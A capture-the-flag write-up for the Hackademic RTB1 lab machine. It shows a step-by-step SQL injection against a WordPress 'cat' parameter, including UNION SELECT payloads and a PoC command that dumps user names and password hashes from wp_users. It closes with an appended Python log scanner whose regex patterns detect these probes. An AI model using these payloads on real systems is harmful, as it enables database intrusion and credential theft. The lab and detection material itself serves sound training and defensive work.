This is the first realistic hackademic challenge (root this box) by mr.pr0n. Download the target and get root. After all, try to read the contents of the file 'key.txt' in the root directory. Enjoy!
Hackademic RTB1 VM Download
The PoC that I wrote for automating the SQL injection can be found here.
http://192.168.216.139/Hackademic_RTB1/?cat=1
http://192.168.216.139/Hackademic_RTB1/?cat=1'
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 1
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 2
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 3
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 4
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 5
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 6
WordPress database error: [Unknown column '6' in 'order clause']
SELECT * FROM wp_categories WHERE cat_ID = 1 order by 6 LIMIT 1
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0)
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(5)
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0) union select 1,2,3,4,5
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0) union select 1,version(),3,4,5
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0) union select 1,user(),3,4,5
./poc.py 192.168.216.139 'group_concat(id,0x20,user_pass,0x20,user_login) from wp_users'
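Every request above puts SQL into the `cat` parameter, which the error message shows being concatenated unquoted into `WHERE cat_ID = ...`. The following is an added example, not part of the original write-up or its PoC: a log check that accepts `cat` only as an integer and labels the probe types seen on this page. The function names, the Apache-style log format and the sample log lines (client address, timestamp, sizes) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators drawn from the request sequence shown on this page.
INDICATORS = [
    ("quote probe", re.compile(r"['\"]")),
    ("order-by column count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("time-based probe", re.compile(r"\bsleep\s*\(", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_cat(target):
    """Return (valid, indicators) for the `cat` parameter of a request target."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("cat", [])
    valid, hits = True, []
    for value in values:
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue  # a plain category ID: the only form a category link needs
        valid = False
        hits += [name for name, rx in INDICATORS if rx.search(value)]
    return valid, hits

def scan(lines):
    """Return (client, indicators) for each log line whose `cat` is not an integer."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        valid, hits = classify_cat(m.group(2))
        if not valid:
            findings.append((m.group(1), hits or ["non-integer cat"]))
    return findings

# Constructed access-log lines; client address, timestamp and size are made up.
_P = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /Hackademic_RTB1/?cat='
_S = ' HTTP/1.1" 200 5120'
SAMPLE_LOG = [_P + v + _S for v in (
    "1", "1%27", "1%20order%20by%206", "1%20and%20sleep(5)",
    "1%20and%20sleep(0)%20union%20select%201,version(),3,4,5",
)]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, ", ".join(hits))
```

The same integer-only test applied to `cat` before it reaches the query is what closes the injection point; the indicator labels only help triage logs after the fact.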